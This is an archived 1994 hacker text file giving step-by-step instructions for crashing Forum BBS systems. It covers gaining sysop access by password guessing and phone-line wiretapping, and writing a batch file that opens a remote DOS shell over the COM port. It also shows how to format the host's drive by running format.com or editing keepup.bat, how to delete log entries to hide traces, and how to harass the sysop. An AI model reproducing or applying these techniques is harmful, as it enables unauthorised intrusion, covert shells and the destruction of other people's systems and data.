home *** CD-ROM | disk | FTP | other *** search
/ Hackers Underworld 2: Forbidden Knowledge / Hackers Underworld 2: Forbidden Knowledge.iso / HACKING / FORUM.TXT < prev    next >
Text File  |  1994-07-17  |  7KB  |  129 lines

  1. ******************************************************************************
  2. *                      |--------------------------|                          *
  3. *                       CRASHING ->FORUM<- BOARDS!                           *
  4. *                      |--------------------------|                          *
  5. *                              TYPED BY:                                     *
  6. *%$%$%$%$%$%$%$%$%$%$%$%$%$<<  PINK PANTHER  >>$%$%$%$%$%$%$%$%$%$%$%$%$%$%$%*
  7. *                                                                            *
  8. ******************************************************************************
  9.  
  10.  
  11. -> How to kill or crash forum boards.
  12.  
  13.  
  14.  Believe or not forum boards can be the easiest boards to crash.  Some people
  15. think otherwise, but here are some tips.
  16.  
  17.  First of all you need sysop access (real sysop access).  I'll leave
  18. that up to your hacking techniques.  Notice you can log on as a user and use
  19. the 'X' command to transfer to another user.  The system will give you 3 tries
  20. at the password, but if you don't get it right it will not hang up on you
  21. and the best part is that it does not record what happens in the system
  22. log even if you enter the wrong password.  The only thing that is recorded
  23. in the system log is if you successfully transfered to a user.  The
  24. sysop user number is ALWAYS 1.  Another method is to hook up a tape
  25. recorder to the fone line of the sysop's house and wait for someone
  26. to log on who has some good access.  Then take the tape recorder
  27. and hook it up to your line and play it back.  You then can discipher
  28. who the user is and his password.
  29.  
  30.  Once you have gotten sysop access (real sysop access) go into the
  31. transfer section.  Use '%' to get to the sponsor/sysop menu and find
  32. out where the files that I am about to list are by using the 'F' command
  33. to look at directories.  Once you have found them, add them by 'A'.
  34. Ok, here are the files to find and add in this order.
  35.  
  36.    syslog.            { usually in Forum directory }
  37.    config.dat         {   "      "   "      "      }
  38.    config.bbs         {   "      "   "      "      }
  39.    config.com         {   "      "   "      "      }
  40.    keepup.bat         {   "      "   "      "      }
  41.    autoexec.bat       {   "     in root directory }
  42.    config.sys         {   "      "  "       "     }
  43.  
  44.  
  45.  Now go and download all these files.  Once you have these, upload the
  46. file format.com from your dos disk.  Now you need to do some searching to find
  47. out if the board has a doors section (this is standard on all forum
  48. systems, but some sysops take it out all together).  All you have to make
  49. sure is that there are doors (whether you have access to them or not).
  50. If they do, this is what you do. Run config.com and look through the
  51. options to you find an option that says 'Allows remote door operation'
  52. and 'Allow doors at all' and put yes for both of them.  Also note what com
  53. port the system is using, you will need it later.  Save the file by
  54. 'S' and then use '%' to get into the sponsor/sysop menu and delete
  55. the file config.bbs from both the file section and the disk.  Now quit
  56. and make an area by chosing a section that is not there (if the highest
  57. file section is numbered 10, then type '*11' to create a file section 11)
  58. and follow the questions.  Put the file directory as the directory where you
  59. found config.bbs.  Now upload config.bbs into that area.  Disconnect
  60. and call back (this allows it to get out of forum and read the new
  61. configuration file again).
  62.  
  63.  Once you are on again, get sysop access and create a dos door, by using
  64. '%' to get sysop access to the door section and add a door, answering
  65. all questions (enter a valid batch file, but make sure it does not
  66. exist on the drive).  When it says batch file not found it should give
  67. you some lines to type out a batch file.  For the batch file use this.
  68.  
  69.    Echo Jumping into DOS now! > COM1   { COM2 if it's using the second port }
  70.    Echo Type EXIT when you are done.  DO NOT HANG UP! > COM1
  71.    C:\COMMAND <COM1 >COM1
  72.    Echo Going back to Forum! > COM1
  73.    C:                                  { Substitute drive forum is running on }
  74.    CD\FORUM                            { Forum directory, change if needed }
  75.  
  76.  Go and open the door and you will be in DOS.
  77.  
  78.  Now go find out where you uploaded format.com and run that file.
  79. Just wait and sit until it formats the disk.  After, hangup
  80. and the board has now disappeared into the thin air (no trace of you).
  81.  
  82.  What to do if the sysop has taken out the doors?  If so, then you need to
  83. edit the file keepup.bat.  On the first line, put in the following.
  84.  
  85.   echo CR | c:\forum\new\format c:  { change the directory if necessary,
  86.                                       it should be the directory that you
  87.                                       uploaded format.com in }
  88.  
  89.  Now delete the old keepup.bat by using the sponsor/sysop menu
  90. and 'D'. Go into the area that you created (this should be the area that
  91. the old keepup.bat was in) and now upload this new keepup.bat. Hang up
  92. and now it will exit forum and go into keepup.bat executing the
  93. format command which will format the drive.
  94.  
  95.  If you just wanted to teach the sysop a lesson, you only need
  96. to delete what you can manually (killing sub-boards, file areas,
  97. files, etc).  And for a final crash - if the board has external protocols
  98. you can send the system into an eternal crash by trying to upload or
  99. download and aborting at the right time (takes a little practice, but
  100. you will know when it has crashed when you see no prompt after aborting).
  101.  
  102.  Now if you want to start messing with minds, there are several things
  103. you can do. First of all you have to remember to delete the system
  104. log when you are done, or better yet if you know a little pascal
  105. and have forum source code in your hands, you can create a little
  106. program that reads the system log and takes out the last couple of
  107. entries. You can always mess with the autoexec.bat and always delete
  108. the old one and upload the new one in it's place. If you want
  109. to put a device driver in, you have config.sys to do that.
  110.  
  111.  Of course, these are software techniques, there are other drastic
  112. techniques, such as blowing up modems, but that's if you really serious.
  113.  
  114.  Another little tip.  If a sysop's chat is off, there is still another
  115. way to annoy him.  Create a file full of chr(7) (you can use ALT-7 in
  116. some wordprocessors such as QEDIT which will produce a funny
  117. character).  Make the file pretty large and ascii upload it, then go
  118. and download it.  It will make the sysop's bell ring (provided that he
  119. doesn't have a speaker switch).  If the system does not allow ascii
  120. uploads, then upload it by protocols and download by typing the
  121. file ('T'). It will have the same affect.
  122.  
  123.  Happy Crashing and I don't take no responsibility for other's actions.
  124.  
  125.  
  126.  
  127.  
  128. Downloaded From P-80 International Information Systems 304-744-2253
  129.